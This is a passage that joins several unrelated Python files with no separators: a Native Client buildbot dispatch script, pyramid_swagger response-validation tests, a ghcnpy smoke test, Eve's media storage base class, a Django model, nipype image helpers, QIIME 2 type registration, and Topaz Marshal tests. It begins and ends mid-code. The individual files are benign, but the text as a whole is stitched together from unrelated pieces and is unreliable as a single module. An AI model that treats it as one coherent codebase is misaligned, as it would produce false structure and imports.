    'nacl-precise-64-64-newlib-coverage':
         python + (' buildbot/buildbot_standard.py '
                   'coverage 64 newlib --coverage'),
    'nacl-win32-newlib-coverage':
         python + (' buildbot/buildbot_standard.py '
                   'coverage 32 newlib --coverage'),
    # Clang trybots.
    'nacl-precise_64-newlib-dbg-clang':
        python + ' buildbot/buildbot_standard.py dbg 64 newlib --clang',
    'nacl-mac10.6-newlib-dbg-clang':
        python + ' buildbot/buildbot_standard.py dbg 32 newlib --clang',
    # Pnacl main trybots
    'nacl-precise_64-newlib-arm_qemu-pnacl':
        bash + ' buildbot/buildbot_pnacl.sh mode-trybot-qemu',
    'nacl-precise_64-newlib-x86_32-pnacl':
         python + ' buildbot/buildbot_pnacl.py opt 32 pnacl',
    'nacl-precise_64-newlib-x86_64-pnacl':
         python + ' buildbot/buildbot_pnacl.py opt 64 pnacl',
    'nacl-precise_64-newlib-mips-pnacl':
        echo + ' "TODO(mseaborn): add mips"',
    'nacl-arm_opt_panda':
        bash + ' buildbot/buildbot_pnacl.sh mode-buildbot-arm-try',
    'nacl-arm_hw_opt_panda':
        bash + ' buildbot/buildbot_pnacl.sh mode-buildbot-arm-hw-try',
    'nacl-mac10.8_newlib_opt_pnacl':
        python + ' buildbot/buildbot_pnacl.py opt 32 pnacl',
    'nacl-win7_64_newlib_opt_pnacl':
        python + ' buildbot/buildbot_pnacl.py opt 64 pnacl',
    # Pnacl spec2k trybots
    'nacl-precise_64-newlib-x86_32-pnacl-spec':
        bash + ' buildbot/buildbot_spec2k.sh pnacl-trybot-x8632',
    'nacl-precise_64-newlib-x86_64-pnacl-spec':
        bash + ' buildbot/buildbot_spec2k.sh pnacl-trybot-x8664',
    'nacl-arm_perf_panda':
        bash + ' buildbot/buildbot_spec2k.sh pnacl-trybot-arm-buildonly',
    'nacl-arm_hw_perf_panda':
        bash + ' buildbot/buildbot_spec2k.sh pnacl-trybot-arm-hw',
    # Toolchain glibc.
    'precise64-glibc': bash + ' buildbot/buildbot_linux-glibc-makefile.sh',
    'mac-glibc': bash + ' buildbot/buildbot_mac-glibc-makefile.sh',
    'win7-glibc': 'buildbot\\buildbot_windows-glibc-makefile.bat',
    # Toolchain newlib x86.
    'win7-toolchain_x86': 'buildbot\\buildbot_toolchain_win.bat',
    'mac-toolchain_x86': bash + ' buildbot/buildbot_toolchain.sh mac',
    'precise64-toolchain_x86': bash + ' buildbot/buildbot_toolchain.sh linux',
    # Toolchain newlib arm.
    'win7-toolchain_arm':
        python +
        ' buildbot/buildbot_toolchain_build.py'
        ' toolchain_build'
        ' --buildbot',
    'mac-toolchain_arm':
        python +
        ' buildbot/buildbot_toolchain_build.py'
        ' toolchain_build'
        ' --buildbot',
    'precise64-toolchain_arm':
        python +
        ' buildbot/buildbot_toolchain_build.py'
        ' toolchain_build'
        ' --buildbot',

    # BIONIC toolchain builders.
    'precise64-toolchain_bionic':
        python +
        ' buildbot/buildbot_toolchain_build.py'
        ' toolchain_build_bionic'
        ' --buildbot',

    # Pnacl toolchain builders.
    'linux-armtools-x86_32':
        bash + ' buildbot/buildbot_toolchain_arm_trusted.sh',
    'linux-pnacl-x86_32':
        python + ' buildbot/buildbot_pnacl_toolchain.py --buildbot',
    'linux-pnacl-x86_64':
        python + ' buildbot/buildbot_pnacl_toolchain.py --buildbot',
    'precise-pnacl-x86_32':
        python + ' buildbot/buildbot_pnacl_toolchain.py --buildbot',
    'precise-pnacl-x86_64':
        python + ' buildbot/buildbot_pnacl_toolchain.py --buildbot',
    'mac-pnacl-x86_32':
        python + ' buildbot/buildbot_pnacl_toolchain.py --buildbot',
    # TODO(robertm): Delete this once we are using win-pnacl-x86_64
    'win-pnacl-x86_32':
        python + ' buildbot/buildbot_pnacl_toolchain.py --buildbot',
    # TODO(robertm): use this in favor or the misnamed win-pnacl-x86_32
    'win-pnacl-x86_64':
        python + ' buildbot/buildbot_pnacl_toolchain.py --buildbot',

    # Pnacl toolchain testers
    'linux-pnacl-x86_64-tests-x86_64':
        bash + ' buildbot/buildbot_pnacl_toolchain_tests.sh tc-test-bot x86-64',
    'linux-pnacl-x86_64-tests-x86_32':
        bash + ' buildbot/buildbot_pnacl_toolchain_tests.sh tc-test-bot x86-32',
    'linux-pnacl-x86_64-tests-arm':
        bash + ' buildbot/buildbot_pnacl_toolchain_tests.sh tc-test-bot arm',

    # MIPS toolchain buildbot.
    'linux-pnacl-x86_32-tests-mips':
        bash + ' buildbot/buildbot_toolchain_mips_trusted.sh',

    # Toolchain trybots.
    'nacl-toolchain-precise64-newlib':
        bash + ' buildbot/buildbot_toolchain.sh linux',
    'nacl-toolchain-mac-newlib': bash + ' buildbot/buildbot_toolchain.sh mac',
    'nacl-toolchain-win7-newlib': 'buildbot\\buildbot_toolchain_win.bat',
    'nacl-toolchain-precise64-newlib-arm':
        python +
        ' buildbot/buildbot_toolchain_build.py'
        ' toolchain_build'
        ' --trybot',
    'nacl-toolchain-mac-newlib-arm':
        python +
        ' buildbot/buildbot_toolchain_build.py'
        ' toolchain_build'
        ' --trybot',
    'nacl-toolchain-win7-newlib-arm':
        python +
        ' buildbot/buildbot_toolchain_build.py'
        ' toolchain_build'
        ' --trybot',
    'nacl-toolchain-precise64-glibc':
        bash + ' buildbot/buildbot_linux-glibc-makefile.sh',
    'nacl-toolchain-mac-glibc':
        bash + ' buildbot/buildbot_mac-glibc-makefile.sh',
    'nacl-toolchain-win7-glibc':
        'buildbot\\buildbot_windows-glibc-makefile.bat',

    # Pnacl toolchain trybots.
    'nacl-toolchain-linux-pnacl-x86_32':
        python + ' buildbot/buildbot_pnacl_toolchain.py --trybot',
    'nacl-toolchain-linux-pnacl-x86_64':
        python + ' buildbot/buildbot_pnacl_toolchain.py --trybot',
    'nacl-toolchain-linux-pnacl-mips': echo + ' "TODO(mseaborn)"',
    'nacl-toolchain-precise-pnacl-x86_32':
        python + ' buildbot/buildbot_pnacl_toolchain.py --trybot',
    'nacl-toolchain-precise-pnacl-x86_64':
        python + ' buildbot/buildbot_pnacl_toolchain.py --trybot',
    'nacl-toolchain-precise-pnacl-mips': echo + ' "TODO(mseaborn)"',
    'nacl-toolchain-mac-pnacl-x86_32':
        python + ' buildbot/buildbot_pnacl_toolchain.py --trybot',
    'nacl-toolchain-win7-pnacl-x86_64':
        python + ' buildbot/buildbot_pnacl_toolchain.py --trybot',

}

# Platforms for which only the 'arm' architecture variant is generated.
special_for_arm = [
    'win7_64',
    'win7-64',
    'lucid-64',
    'lucid64',
    'precise-64',
    'precise64'
]
# Programmatically generate the standard buildbot and trybot entries for
# every platform/arch/mode/libc combination and merge them into
# BOT_ASSIGNMENT.  The asserts guard against clobbering a hand-written
# entry above.
for platform in [
    'vista', 'win7', 'win8', 'win',
    'mac10.6', 'mac10.7', 'mac10.8',
    'lucid', 'precise'] + special_for_arm:
  if platform in special_for_arm:
    arch_variants = ['arm']
  else:
    arch_variants = ['', '32', '64', 'arm']
  for arch in arch_variants:
    arch_flags = ''
    real_arch = arch
    arch_part = '-' + arch
    # Disable GYP build for win32 bots and arm cross-builders. In this case
    # "win" means Windows XP, not Vista, Windows 7, etc.
    #
    # Building via GYP always builds all toolchains by default, but the win32
    # XP pnacl builds are pathologically slow (e.g. ~38 seconds per compile on
    # the nacl-win32_glibc_opt trybot). There are other builders that test
    # Windows builds via gyp, so the reduced test coverage should be slight.
    if arch == 'arm' or (platform == 'win' and arch == '32'):
      arch_flags += ' --no-gyp'
    if arch == '':
      # Empty arch means "platform default": no suffix in the bot name and a
      # 32-bit build.
      arch_part = ''
      real_arch = '32'
    # Test with Breakpad tools only on basic Linux builds.
    # NOTE(review): this tests the platform running this script, not the
    # target bot's platform, so the flag is applied to every generated entry
    # when generated on Linux.
    if sys.platform.startswith('linux'):
      arch_flags += ' --use-breakpad-tools'
    for mode in ['dbg', 'opt']:
      for libc in ['newlib', 'glibc']:
        # Buildbots.
        for bare in ['', '-bare']:
          name = platform + arch_part + bare + '-' + libc + '-' + mode
          assert name not in BOT_ASSIGNMENT, name
          BOT_ASSIGNMENT[name] = (
              python + ' buildbot/buildbot_standard.py ' +
              mode + ' ' + real_arch + ' ' + libc + arch_flags)
        # Trybots
        for arch_sep in ['', '-', '_']:
          name = 'nacl-' + platform + arch_sep + arch + '_' + libc + '_' + mode
          assert name not in BOT_ASSIGNMENT, name
          BOT_ASSIGNMENT[name] = (
              python + ' buildbot/buildbot_standard.py ' +
              mode + ' ' + real_arch + ' ' + libc + arch_flags)

def EscapeJson(data):
  """Serialize *data* to JSON, escape embedded double quotes, and wrap the
  whole thing in literal double quotes so it survives shell word-splitting
  when passed on the runtest.py command line."""
  serialized = json.dumps(data).replace('"', r'\"')
  return '"%s"' % serialized


def Main():
  """Run the build/test command assigned to this buildbot slave.

  Looks up the command for $BUILDBOT_BUILDERNAME in BOT_ASSIGNMENT, prepares
  the child environment, optionally wraps the command with runtest.py (so
  perf data is uploaded for non-trybot release builds), then runs it through
  a shell and exits with the command's return code.
  """
  builder = os.environ.get('BUILDBOT_BUILDERNAME')
  build_number = os.environ.get('BUILDBOT_BUILDNUMBER')
  slave_type = os.environ.get('BUILDBOT_SLAVE_TYPE')
  cmd = BOT_ASSIGNMENT.get(builder)
  if not cmd:
    sys.stderr.write('ERROR - unset/invalid builder name\n')
    sys.exit(1)

  env = os.environ.copy()

  # Don't write out .pyc files because in cases in which files move around or
  # the PYTHONPATH / sys.path change, old .pyc files can be mistakenly used.
  # This avoids the need for admin changes on the bots in this case.
  env['PYTHONDONTWRITEBYTECODE'] = '1'

  # Use .boto file from home-dir instead of buildbot supplied one.
  if 'AWS_CREDENTIAL_FILE' in env:
    del env['AWS_CREDENTIAL_FILE']
  env['BOTO_CONFIG'] = os.path.expanduser('~/.boto')
  env['GSUTIL'] = '/b/build/third_party/gsutil/gsutil'

  # When running from cygwin, we sometimes want to use a native python.
  # The native python will use the depot_tools version by invoking python.bat.
  if pynacl.platform.IsWindows():
    env['NATIVE_PYTHON'] = 'python.bat'
  else:
    env['NATIVE_PYTHON'] = 'python'

  if sys.platform == 'win32':
    # If the temp directory is not on the same drive as the working directory,
    # there can be random failures when cleaning up temp directories, so use
    # a directory on the current drive. Use __file__ here instead of os.getcwd()
    # because toolchain_main picks its working directories relative to __file__
    filedrive, _ = os.path.splitdrive(__file__)
    tempdrive, _ = os.path.splitdrive(env['TEMP'])
    if tempdrive != filedrive:
      env['TEMP'] = filedrive + '\\temp'
      env['TMP'] = env['TEMP']
      if not os.path.exists(env['TEMP']):
        os.mkdir(env['TEMP'])

  # Run through runtest.py to get upload of perf data.
  build_properties = {
      'buildername': builder,
      'mastername': 'client.nacl',
      # NOTE: when BUILDBOT_BUILDNUMBER is unset this stringifies to 'None';
      # such runs skip the runtest.py existence check below anyway.
      'buildnumber': str(build_number),
  }
  factory_properties = {
      'perf_id': builder,
      'show_perf_results': True,
      'step_name': 'naclperf',  # Seems unused, but is required.
      'test_name': 'naclperf',  # Really "Test Suite"
  }
  # Locate the buildbot build directory by relative path, as it's absolute
  # location varies by platform and configuration.
  buildbot_build_dir = os.path.join(*([os.pardir] * 4))
  runtest = os.path.join(buildbot_build_dir, 'scripts', 'slave', 'runtest.py')
  # For builds with an actual build number, require that the script is present
  # (i.e. that we're run from an actual buildbot).
  if build_number is not None and not os.path.exists(runtest):
    raise Exception('runtest.py script not found at: %s\n' % runtest)
  cmd_exe = cmd.split(' ')[0]
  cmd_exe_ext = os.path.splitext(cmd_exe)[1]
  # Do not wrap these types of builds with runtest.py:
  # - tryjobs
  # - commands beginning with 'echo '
  # - batch files
  # - debug builders
  if not (slave_type == 'Trybot' or
          cmd_exe == echo or
          cmd_exe_ext == '.bat' or
          '-dbg' in builder):
    # Perf dashboards are now generated by output scraping that occurs in the
    # script runtest.py, which lives in the buildbot repository.
    # Non-trybot builds should be run through runtest, allowing it to upload
    # perf data if relevant.
    cmd = ' '.join([
        python, runtest,
        '--build-dir=src/out',
        '--results-url=https://chromeperf.appspot.com',
        '--annotate=graphing',
        '--no-xvfb',  # We provide our own xvfb invocation.
        '--factory-properties', EscapeJson(factory_properties),
        '--build-properties', EscapeJson(build_properties),
        cmd,
    ])

  # Parenthesized print emits the same output on Python 2 and is also valid
  # Python 3; the previous bare print statement broke under Python 3.
  print("%s runs: %s\n" % (builder, cmd))
  retcode = subprocess.call(cmd, env=env, shell=True)
  sys.exit(retcode)


# Script entry point: dispatch to Main() when invoked directly by buildbot.
if __name__ == '__main__':
  Main()

from contextlib import contextmanager
from _pytest.python import FixtureRequest

import mock
from mock import Mock
import pyramid.testing
from webob.multidict import MultiDict
import pyramid_swagger
import pyramid_swagger.tween
import pytest
import simplejson
from pyramid.config import Configurator
from pyramid.interfaces import IRoutesMapper
from pyramid.registry import Registry
from pyramid.response import Response
from pyramid.urldispatch import RoutesMapper
from webtest import AppError

from .request_test import test_app
from pyramid_swagger.exceptions import ResponseValidationError
from pyramid_swagger.ingest import compile_swagger_schema
from pyramid_swagger.ingest import get_resource_listing
from pyramid_swagger.tween import validation_tween_factory


class CustomResponseValidationException(Exception):
    """Marker exception raised by the custom validation context below so
    tests can verify that the configured context was actually used."""


class EnhancedDummyRequest(pyramid.testing.DummyRequest):
    """
    pyramid.testing.DummyRequest doesn't support MultiDicts like the real
    pyramid.request.Request so this is the next best thing.
    """
    def __init__(self, **kw):
        super(EnhancedDummyRequest, self).__init__(**kw)
        # Real requests expose GET as a MultiDict (supports repeated keys).
        self.GET = MultiDict(self.GET)
        # Make sure a content_type attr exists even when not passed in via
        # **kw (DummyRequest only sets attributes it is given).
        self.content_type = getattr(self, 'content_type', None)


@contextmanager
def validation_context(request, response=None):
    """Custom validation context: any failure inside the managed block is
    converted to CustomResponseValidationException, letting tests confirm
    that pyramid_swagger routed validation through this context."""
    try:
        yield
    except Exception:
        raise CustomResponseValidationException()


# Dotted import path of the validation_context manager in this module, as
# consumed by the 'pyramid_swagger.validation_context_path' setting.
validation_ctx_path = 'tests.acceptance.response_test.validation_context'


def get_registry(settings):
    """Build a pyramid Registry named 'testing' carrying *settings* and a
    fresh RoutesMapper utility, committed and ready for the tween factory."""
    registry = Registry('testing')
    configurator = Configurator(registry=registry)
    if getattr(registry, 'settings', None) is None:
        # NOTE(review): _set_settings is private pyramid API; kept as-is.
        configurator._set_settings(settings)
    registry.registerUtility(RoutesMapper(), IRoutesMapper)
    configurator.commit()
    return registry


def get_swagger_schema(schema_dir='tests/sample_schemas/good_app/'):
    """Compile and return the Swagger 1.2 schema found under *schema_dir*."""
    listing = get_resource_listing(schema_dir, False)
    return compile_swagger_schema(schema_dir, listing)


def _validate_against_tween(request, response=None, **overrides):
    """
    Acceptance testing helper for testing the validation tween with Swagger 1.2
    responses.

    :param request: pytest fixture
    :param response: standard fixture by default
    """
    def handler(_request):
        return response or Response()

    base_settings = {
        'pyramid_swagger.swagger_versions': ['1.2'],
        'pyramid_swagger.enable_swagger_spec_validation': False,
        'pyramid_swagger.schema_directory': 'tests/sample_schemas/good_app/',
    }
    base_settings.update(overrides)
    base_settings['pyramid_swagger.schema12'] = get_swagger_schema()
    base_settings['pyramid_swagger.schema20'] = None
    registry = get_registry(base_settings)

    # Let's make request validation a no-op so we can focus our tests.
    with mock.patch.object(pyramid_swagger.tween, 'validate_request'):
        tween = validation_tween_factory(handler, registry)
        tween(request)


def test_response_validation_enabled_by_default():
    """Response validation should run without being explicitly enabled."""
    req = EnhancedDummyRequest(
        method='GET',
        path='/sample/path_arg1/resource',
        params={'required_arg': 'test'},
        matchdict={'path_arg': 'path_arg1'},
    )
    # The schema requires 'logging_info'; omitting it must trip validation.
    resp = Response(
        body=simplejson.dumps({'raw_response': 'foo'}),
        headers={'Content-Type': 'application/json; charset=UTF-8'},
    )
    with pytest.raises(ResponseValidationError) as exc:
        _validate_against_tween(req, response=resp)
    assert "'logging_info' is a required property" in str(exc.value)


def test_500_when_response_is_missing_required_field():
    """A body lacking a schema-required field must fail response validation."""
    req = EnhancedDummyRequest(
        method='GET',
        path='/sample/path_arg1/resource',
        params={'required_arg': 'test'},
        matchdict={'path_arg': 'path_arg1'},
    )
    # 'logging_info' is deliberately left out of the payload.
    resp = Response(
        body=simplejson.dumps({'raw_response': 'foo'}),
        headers={'Content-Type': 'application/json; charset=UTF-8'},
    )
    with pytest.raises(ResponseValidationError) as exc:
        _validate_against_tween(req, response=resp)
    assert "'logging_info' is a required property" in str(exc.value)


def test_200_when_response_is_void_with_none_response():
    """A void endpoint accepts a JSON null body without raising."""
    req = EnhancedDummyRequest(
        method='GET',
        path='/sample/nonstring/{int_arg}/{float_arg}/{boolean_arg}',
        params={'required_arg': 'test'},
        matchdict={'int_arg': '1', 'float_arg': '2.0', 'boolean_arg': 'true'},
    )
    resp = Response(
        body=simplejson.dumps(None),
        headers={'Content-Type': 'application/json; charset=UTF-8'},
    )
    # Must not raise.
    _validate_against_tween(req, response=resp)


def test_200_when_response_is_void_with_empty_response():
    """A void endpoint accepts an empty JSON object body without raising."""
    req = EnhancedDummyRequest(
        method='GET',
        path='/sample/nonstring/{int_arg}/{float_arg}/{boolean_arg}',
        params={'required_arg': 'test'},
        matchdict={'int_arg': '1', 'float_arg': '2.0', 'boolean_arg': 'true'},
    )
    # Must not raise.
    _validate_against_tween(req, response=Response(body='{}'))


def test_500_when_response_arg_is_wrong_type():
    """A field of the wrong JSON type must fail response validation."""
    req = EnhancedDummyRequest(
        method='GET',
        path='/sample/path_arg1/resource',
        params={'required_arg': 'test'},
        matchdict={'path_arg': 'path_arg1'},
    )
    # 'raw_response' is declared as a string; send a float instead.
    payload = {
        'raw_response': 1.0,
        'logging_info': {'foo': 'bar'}
    }
    resp = Response(
        body=simplejson.dumps(payload),
        headers={'Content-Type': 'application/json; charset=UTF-8'},
    )
    with pytest.raises(ResponseValidationError) as exc:
        _validate_against_tween(req, response=resp)
    assert "1.0 is not of type 'string'" in str(exc.value)


def test_500_for_bad_validated_array_response():
    """Array responses are validated element-wise; a bad enum must fail."""
    req = EnhancedDummyRequest(
        method='GET',
        path='/sample_array_response',
    )
    resp = Response(
        body=simplejson.dumps([{"enum_value": "bad_enum_value"}]),
        headers={'Content-Type': 'application/json; charset=UTF-8'},
    )
    with pytest.raises(ResponseValidationError) as exc:
        _validate_against_tween(req, response=resp)
    assert "is not one of ['good_enum_value']" in str(exc.value)


def test_200_for_good_validated_array_response():
    """An array response whose elements match the schema passes."""
    req = EnhancedDummyRequest(
        method='GET',
        path='/sample_array_response',
    )
    resp = Response(
        body=simplejson.dumps([{"enum_value": "good_enum_value"}]),
        headers={'Content-Type': 'application/json; charset=UTF-8'},
    )
    # Must not raise.
    _validate_against_tween(req, response=resp)


def test_200_for_normal_response_validation():
    """A schema-conforming POST succeeds with response validation enabled."""
    settings = {'pyramid_swagger.enable_response_validation': True}
    app = test_app(
        request=Mock(spec=FixtureRequest, param=['1.2']),
        **settings
    )
    resp = app.post_json('/sample', {'foo': 'test', 'bar': 'test'})
    assert resp.status_code == 200


def test_200_skip_validation_for_excluded_path():
    # FIXME(#64): This test is broken and doesn't check anything.
    settings = {'pyramid_swagger.exclude_paths': [r'^/sample/?']}
    app = test_app(
        request=Mock(spec=FixtureRequest, param=['1.2']),
        **settings
    )
    resp = app.get(
        '/sample/path_arg1/resource',
        params={'required_arg': 'test'}
    )
    assert resp.status_code == 200


def test_app_error_if_path_not_in_spec_and_path_validation_disabled():
    """If path missing and validation is disabled we want to let something else
    handle the error. TestApp throws an AppError, but Pyramid would throw a
    HTTPNotFound exception.
    """
    with pytest.raises(AppError):
        settings = {'pyramid_swagger.enable_path_validation': False}
        app = test_app(
            request=Mock(spec=FixtureRequest, param=['1.2']),
            **settings
        )
        assert app.get('/this/path/doesnt/exist')


def test_response_validation_context():
    """Validation errors are routed through the configured context manager."""
    req = EnhancedDummyRequest(
        method='GET',
        path='/sample/path_arg1/resource',
        params={'required_arg': 'test'},
        matchdict={'path_arg': 'path_arg1'},
    )
    # Missing 'logging_info' forces a validation failure, which the custom
    # context converts into CustomResponseValidationException.
    resp = Response(
        body=simplejson.dumps({'raw_response': 'foo'}),
        headers={'Content-Type': 'application/json; charset=UTF-8'},
    )
    overrides = {'pyramid_swagger.validation_context_path': validation_ctx_path}
    with pytest.raises(CustomResponseValidationException):
        _validate_against_tween(req, response=resp, **overrides)

import ghcnpy

# Smoke-test driver for the ghcnpy package.
# Print the package introduction banner.
ghcnpy.intro()

# Report the latest GHCN-Daily dataset version
# (presumably fetched over the network - TODO confirm).
ghcnpy.get_ghcnd_version()

# Exercise station search by name.
print("\nTESTING SEARCH CAPABILITIES")
ghcnpy.find_station("Asheville")

# Exercise data download for one station id; returns the output filename.
print("\nTESTING PULL CAPABILITIES")
outfile=ghcnpy.get_data_station("USW00003812")
print(outfile," has been downloaded")

# -*- coding: utf-8 -*-

"""
    eve.io.media
    ~~~~~~~~~~~~

    Media storage for Eve-powered APIs.

    :copyright: (c) 2014 by Nicola Iarocci.
    :license: BSD, see LICENSE for more details.
"""


class MediaStorage(object):
    """ The MediaStorage class provides a standardized API for storing files,
    along with a set of default behaviors that all other storage systems can
    inherit or override as necessary.

    .. versionadded:: 0.3
    """

    def __init__(self, app=None):
        """
        :param app: the flask application (eve itself). This can be used by
        the class to access, amongst other things, the app.config object to
        retrieve class-specific settings.
        """
        self.app = app

    def get(self, id_or_filename):
        """ Opens the file given by name or unique id. Note that although the
        returned file is guaranteed to be a File object, it might actually be
        some subclass. Returns None if no file was found.
        """
        raise NotImplementedError

    def put(self, content, filename=None, content_type=None):
        """ Saves a new file using the storage system, preferably with the name
        specified. If there already exists a file with this name, the
        storage system may modify the filename as necessary to get a unique
        name. Depending on the storage system, a unique id or the actual name
        of the stored file will be returned. The content type argument is used
        to appropriately identify the file when it is retrieved.

        .. versionchanged:: 0.5
           Allow filename to be optional (#414).
        """
        raise NotImplementedError

    def delete(self, id_or_filename):
        """ Deletes the file referenced by name or unique id. If deletion is
        not supported on the target storage system this will raise
        NotImplementedError instead
        """
        raise NotImplementedError

    def exists(self, id_or_filename):
        """ Returns True if a file referenced by the given name or unique id
        already exists in the storage system, or False if the name is available
        for a new file.
        """
        raise NotImplementedError

from django.utils.translation import ugettext as _
from django.db import models

from jmbo.models import ModelBase


class Superhero(ModelBase):
    # Display name; editable=False keeps the field out of admin/model forms,
    # so it is expected to be populated programmatically.
    name = models.CharField(max_length=256, editable=False)

    class Meta:
        # Override Django's default pluralization ("Superheros").
        verbose_name_plural = _("Superheroes")

# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
''' Processor functions for images '''
import numpy as np

def squeeze_image(img):
    ''' Return image, remove axes length 1 at end of image shape

    For example, an image may have shape (10,20,30,1,1).  In this case
    squeeze will result in an image with shape (10,20,30).  See doctests
    for further description of behavior.

    Parameters
    ----------
    img : ``SpatialImage``

    Returns
    -------
    squeezed_img : ``SpatialImage``
       Copy of img, such that data, and data shape have been squeezed,
       for dimensions > 3rd, and at the end of the shape list

    Examples
    --------
    >>> import nipype.externals.pynifti as nf
    >>> shape = (10,20,30,1,1)
    >>> data = np.arange(np.prod(shape)).reshape(shape)
    >>> affine = np.eye(4)
    >>> img = nf.Nifti1Image(data, affine)
    >>> img.get_shape()
    (10, 20, 30, 1, 1)
    >>> img2 = squeeze_image(img)
    >>> img2.get_shape()
    (10, 20, 30)

    If the data are 3D then last dimensions of 1 are ignored

    >>> shape = (10,1,1)
    >>> data = np.arange(np.prod(shape)).reshape(shape)
    >>> img = nf.ni1.Nifti1Image(data, affine)
    >>> img.get_shape()
    (10, 1, 1)
    >>> img2 = squeeze_image(img)
    >>> img2.get_shape()
    (10, 1, 1)

    Only *final* dimensions of 1 are squeezed

    >>> shape = (1, 1, 5, 1, 2, 1, 1)
    >>> data = data.reshape(shape)
    >>> img = nf.ni1.Nifti1Image(data, affine)
    >>> img.get_shape()
    (1, 1, 5, 1, 2, 1, 1)
    >>> img2 = squeeze_image(img)
    >>> img2.get_shape()
    (1, 1, 5, 1, 2)
    '''
    klass = img.__class__
    shape = img.get_shape()
    # 3D or smaller: nothing beyond the 3rd axis to squeeze - return a copy.
    if len(shape) < 4:
        return klass.from_image(img)
    # Walk trailing dimensions (beyond the 3rd) backwards, counting how many
    # axes survive once final singleton dimensions are dropped.
    keep = len(shape)
    for dim in reversed(shape[3:]):
        if dim != 1:
            break
        keep -= 1
    # No trailing singleton axes found: return an unmodified copy.
    if keep == len(shape):
        return klass.from_image(img)
    squeezed_shape = shape[:keep]
    squeezed_data = img.get_data().reshape(squeezed_shape)
    return klass(squeezed_data,
                 img.get_affine(),
                 img.get_header(),
                 img.extra)


def concat_images(images):
    ''' Concatenate images in list to single image, along last dimension.

    All images must share the affine of the first image; the first
    image's header and class are used for the result.
    '''
    first = images[0]
    base_shape = first.get_shape()
    affine = first.get_affine()
    header = first.get_header()
    # Stack along a new leading axis first; it is rolled to the end below.
    stacked = np.empty((len(images),) + base_shape)
    for idx, image in enumerate(images):
        if not np.all(image.get_affine() == affine):
            raise ValueError('Affines do not match')
        stacked[idx] = image.get_data()
    # Move the image-index axis to the last position.
    stacked = np.rollaxis(stacked, 0, len(base_shape) + 1)
    return first.__class__(stacked, affine, header)


# ----------------------------------------------------------------------------
# Copyright (c) 2016-2021, QIIME 2 development team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file LICENSE, distributed with this software.
# ----------------------------------------------------------------------------

from qiime2.plugin import SemanticType

from ..plugin_setup import plugin
from . import AlphaDiversityDirectoryFormat


# Root semantic type for per-sample data; it has a single type field
# named 'type' which concrete variants (like AlphaDiversity) fill in.
SampleData = SemanticType('SampleData', field_names='type')

# Per-sample alpha-diversity values; declared as a valid member of
# SampleData's 'type' field, i.e. usable as SampleData[AlphaDiversity].
AlphaDiversity = SemanticType('AlphaDiversity',
                              variant_of=SampleData.field['type'])

plugin.register_semantic_types(SampleData, AlphaDiversity)

# Artifacts of type SampleData[AlphaDiversity] are stored on disk using
# the alpha-diversity directory layout.
plugin.register_semantic_type_to_format(
    SampleData[AlphaDiversity],
    artifact_format=AlphaDiversityDirectoryFormat
)

from ..base import BaseTopazTest


class TestMarshal(BaseTopazTest):
    """Tests for the Ruby ``Marshal`` module (dump/load, wire format 4.8).

    The expected strings encode Ruby's marshal byte format: a two-byte
    version header ("\x04\b" == 4.8) followed by type-tagged payloads.
    The commented-out ``Marshal.load('...')`` lines are raw-bytes variants
    replaced by round-trips through ``Marshal.dump`` (presumably because
    the literal escapes were awkward to express) -- kept for reference.
    """

    def test_version_constants(self, space):
        # MAJOR/MINOR constants must match the 4.8 format version, and the
        # first two bytes of any dump must carry the same version numbers.
        w_res = space.execute("return Marshal::MAJOR_VERSION")
        assert space.int_w(w_res) == 4

        w_res = space.execute("return Marshal::MINOR_VERSION")
        assert space.int_w(w_res) == 8

        w_res = space.execute("return Marshal.dump('test')[0].ord")
        assert space.int_w(w_res) == 4

        w_res = space.execute("return Marshal.dump('test')[1].ord")
        assert space.int_w(w_res) == 8

    def test_dump_constants(self, space):
        # nil/true/false dump to the single tag bytes '0', 'T' and 'F'.
        w_res = space.execute("return Marshal.dump(nil)")
        assert space.str_w(w_res) == "\x04\b0"

        w_res = space.execute("return Marshal.dump(true)")
        assert space.str_w(w_res) == "\x04\bT"

        w_res = space.execute("return Marshal.dump(false)")
        assert space.str_w(w_res) == "\x04\bF"

    def test_load_constants(self, space):
        # Inverse of test_dump_constants: raw bytes back to singletons.
        w_res = space.execute("return Marshal.load('\x04\b0')")
        assert w_res == space.w_nil

        w_res = space.execute("return Marshal.load('\x04\bT')")
        assert w_res == space.w_true

        w_res = space.execute("return Marshal.load('\x04\bF')")
        assert w_res == space.w_false

    def test_constants(self, space):
        # Round-trip dump+load of the singleton constants.
        w_res = space.execute("return Marshal.load(Marshal.dump(nil))")
        assert w_res == space.w_nil

        w_res = space.execute("return Marshal.load(Marshal.dump(true))")
        assert w_res == space.w_true

        w_res = space.execute("return Marshal.load(Marshal.dump(false))")
        assert w_res == space.w_false

    def test_dump_tiny_integer(self, space):
        # Integers in [-123, 122] are stored in one byte with a bias
        # (positive n -> n+5, negative n -> n-5 as a signed byte).
        w_res = space.execute("return Marshal.dump(5)")
        assert space.str_w(w_res) == "\x04\bi\n"

        w_res = space.execute("return Marshal.dump(100)")
        assert space.str_w(w_res) == "\x04\bii"

        w_res = space.execute("return Marshal.dump(0)")
        assert space.str_w(w_res) == "\x04\bi\x00"

        w_res = space.execute("return Marshal.dump(-1)")
        assert space.str_w(w_res) == "\x04\bi\xFA"

        w_res = space.execute("return Marshal.dump(-123)")
        assert space.str_w(w_res) == "\x04\bi\x80"

        w_res = space.execute("return Marshal.dump(122)")
        assert space.str_w(w_res) == "\x04\bi\x7F"

    def test_load_tiny_integer(self, space):
        # Inverse of test_dump_tiny_integer.
        w_res = space.execute("return Marshal.load('\x04\bi\n')")
        assert space.int_w(w_res) == 5

        w_res = space.execute("return Marshal.load('\x04\bii')")
        assert space.int_w(w_res) == 100

        #w_res = space.execute('return Marshal.load("\x04\bi\x00")')
        w_res = space.execute('return Marshal.load(Marshal.dump(0))')
        assert space.int_w(w_res) == 0

        w_res = space.execute("return Marshal.load('\x04\bi\xFA')")
        assert space.int_w(w_res) == -1

        w_res = space.execute("return Marshal.load('\x04\bi\x80')")
        assert space.int_w(w_res) == -123

        w_res = space.execute("return Marshal.load('\x04\bi\x7F')")
        assert space.int_w(w_res) == 122

    def test_dump_array(self, space):
        # Arrays: '[' tag, element count (length-encoded), then elements.
        w_res = space.execute("return Marshal.dump([])")
        assert space.str_w(w_res) == "\x04\b[\x00"

        w_res = space.execute("return Marshal.dump([nil])")
